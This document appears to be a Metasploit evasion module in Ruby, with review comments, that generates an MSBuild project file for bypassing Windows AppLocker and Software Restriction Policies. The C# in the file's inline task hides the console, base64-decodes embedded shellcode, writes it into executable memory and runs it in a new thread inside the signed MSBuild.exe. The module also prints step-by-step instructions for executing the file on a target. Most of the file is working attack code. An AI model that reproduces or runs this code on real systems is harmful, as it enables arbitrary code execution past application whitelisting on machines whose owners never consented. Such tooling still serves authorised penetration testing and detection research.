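##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Evasion module that writes an MSBuild project file whose inline C# task
# (CodeTaskFactory) decodes a base64 payload, places it in RWX memory inside
# MSBuild.exe and runs it on a new thread. MSBuild.exe is Microsoft-signed and
# lives under %WINDIR%, which is why it is typically permitted by default
# AppLocker / SRP rules (see MITRE T1127 in the references).
#
# Operator caveats (review notes):
#   * The payload is embedded as plain base64 in the generated file; nothing in
#     this module encrypts or otherwise hides it from static scanning.
#   * The runtime pattern (VirtualAlloc with PAGE_EXECUTE_READWRITE, Marshal.Copy,
#     CreateThread from MSBuild.exe) is a well-known detection signature; only
#     the identifier names are randomised per run.
#   * The project targets ToolsVersion 4.0 and loads Microsoft.Build.Tasks.v4.0.dll,
#     so it must be run with a .NET 4.x MSBuild.exe (e.g. the v4.0.30319 directory).
#   * Hardened environments that explicitly deny MSBuild.exe will block this
#     technique; the module does not check for that.
class MetasploitModule < Msf::Evasion

  # Keys for the identifiers randomised in the generated project. The name of
  # each key documents what the identifier is used for in the C# below.
  IDENTIFIER_KEYS = %i[
    target task commit rwx infinite hwnd sw_hide b64 bytes shellcode mem zero
  ].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Applocker Evasion - MSBuild',
        'Description' => %q{
          This module will assist you in evading Microsoft
          Windows Applocker and Software Restriction Policies.
          This technique utilises the Microsoft signed binary
          MSBuild.exe to execute user supplied code.
        },
        'Author' => [
          'Nick Tyrer <@NickTyrer>', # module development
          'Casey Smith' # msbuild bypass research
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [['Microsoft Windows', {}]],
        'References' => [['URL', 'https://attack.mitre.org/techniques/T1127/']]
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [true, 'Filename for the evasive file (default: msbuild.txt)', 'msbuild.txt'])
      ]
    )
  end

  # Base64 of the encoded payload. It is embedded verbatim as a C# string
  # literal, so the generated file carries the shellcode in the clear.
  #
  # @return [String] base64-encoded payload bytes
  def build_payload
    Rex::Text.encode_base64(payload.encoded)
  end

  # One random 8-character alphabetic token, usable as a C# and XML identifier.
  #
  # @return [String]
  def obfu
    Rex::Text.rand_text_alpha(8)
  end

  # Build a Hash mapping each key to a distinct random identifier.
  # Distinctness is enforced because two identifiers sharing a name (e.g. the
  # task class and a local variable) would make the generated C# fail to
  # compile on the target instead of running the payload.
  #
  # @param keys [Array<Symbol>] identifier roles
  # @return [Hash{Symbol => String}]
  def random_identifiers(keys)
    names = []
    while names.size < keys.size
      candidate = obfu
      names << candidate unless names.include?(candidate)
    end
    keys.zip(names).to_h
  end

  # Render the MSBuild project file.
  #
  # The inline task does the following when MSBuild.exe builds the project:
  #   1. hides the console window (ShowWindow with nCmdShow = 0, SW_HIDE);
  #   2. base64-decodes the embedded payload;
  #   3. VirtualAlloc(MEM_COMMIT = 0x1000, PAGE_EXECUTE_READWRITE = 0x40) of a
  #      buffer the size of the payload and copies the bytes into it;
  #   4. CreateThread on that buffer and WaitForSingleObject with
  #      INFINITE (0xFFFFFFFF), so MSBuild.exe stays alive while the payload runs.
  #
  # @return [String] project XML with the C# task in a CDATA section
  def msbuild
    ids = random_identifiers(IDENTIFIER_KEYS)
    esc = build_payload
    <<~HEREDOC
      <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
        <Target Name="#{ids[:target]}">
          <#{ids[:task]} />
        </Target>
        <UsingTask
          TaskName="#{ids[:task]}"
          TaskFactory="CodeTaskFactory"
          AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
          <Task>
            <Code Type="Class" Language="cs">
              <![CDATA[
              using System;
              using System.Runtime.InteropServices;
              using Microsoft.Build.Framework;
              using Microsoft.Build.Utilities;
              public class #{ids[:task]} : Task, ITask
              {
                private static Int32 #{ids[:commit]}=0x1000;
                private static IntPtr #{ids[:rwx]}=(IntPtr)0x40;
                private static UInt32 #{ids[:infinite]} = 0xFFFFFFFF;
                [System.Runtime.InteropServices.DllImport("kernel32")]
                private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
                [System.Runtime.InteropServices.DllImport("kernel32")]
                private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
                [System.Runtime.InteropServices.DllImport("kernel32")]
                private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
                [System.Runtime.InteropServices.DllImport("user32.dll")]
                static extern bool ShowWindow(IntPtr #{ids[:hwnd]}, int nCmdShow);
                [System.Runtime.InteropServices.DllImport("Kernel32")]
                private static extern IntPtr GetConsoleWindow();
                const int #{ids[:sw_hide]} = 0;
                public override bool Execute()
                {
                  IntPtr #{ids[:hwnd]};
                  #{ids[:hwnd]} = GetConsoleWindow();
                  ShowWindow(#{ids[:hwnd]}, #{ids[:sw_hide]});
                  string #{ids[:b64]} = "#{esc}";
                  byte[] #{ids[:bytes]} = Convert.FromBase64String(#{ids[:b64]});
                  byte[] #{ids[:shellcode]} = #{ids[:bytes]};
                  IntPtr #{ids[:mem]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{ids[:shellcode]}.Length, #{ids[:commit]}, #{ids[:rwx]});
                  System.Runtime.InteropServices.Marshal.Copy(#{ids[:shellcode]}, 0, #{ids[:mem]}, #{ids[:shellcode]}.Length);
                  IntPtr #{ids[:zero]} = IntPtr.Zero;
                  WaitForSingleObject(CreateThread(#{ids[:zero]}, UIntPtr.Zero, #{ids[:mem]}, #{ids[:zero]}, 0, ref #{ids[:zero]}), #{ids[:infinite]});
                  return true;
                }
              }
              ]]>
            </Code>
          </Task>
        </UsingTask>
      </Project>
    HEREDOC
  end

  # Getter/setter for the output file name used by file_create: with no
  # argument it returns the stored name, otherwise it stores and returns it.
  #
  # @param name [String] new file name, or '' to read the current one
  # @return [String, nil]
  def file_format_filename(name = '')
    name.empty? ? @fname : @fname = name
  end

  # Resolve the output file name and write the project file.
  #
  # The name is built without mutating the datastore value in place (the
  # original appended '.txt' with <<, which rewrote the option string and would
  # raise if the datastore ever handed back a frozen string). The resolved name
  # is stored via file_format_filename so that instructions can report the
  # name that was actually written.
  def create_files
    requested = datastore['FILENAME'].to_s
    fname = requested.empty? ? 'msbuild.txt' : requested
    # MSBuild accepts any extension; the .txt suffix is kept to match the
    # operator guidance in the instructions.
    fname += '.txt' unless fname.downcase.end_with?('.txt')
    file_format_filename(fname)
    file_create(msbuild)
  end

  # Print how to run the generated file on the target.
  #
  # Reports the name resolved by create_files rather than the raw FILENAME
  # option, so the printed name always matches the file on disk (the raw option
  # may be empty, or lack the .txt suffix that was appended). The payload's
  # architecture has to match the bitness of the MSBuild.exe that hosts it,
  # hence the Framework vs Framework64 path.
  def instructions
    fname = file_format_filename || datastore['FILENAME']
    print_status "Copy #{fname} to the target"
    if payload.arch.first == ARCH_X86
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\MSBuild.exe #{fname}"
    else
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\MSBuild.exe #{fname}"
    end
  end

  # Module entry point: write the file, then print the usage instructions.
  def run
    create_files
    instructions
  end
end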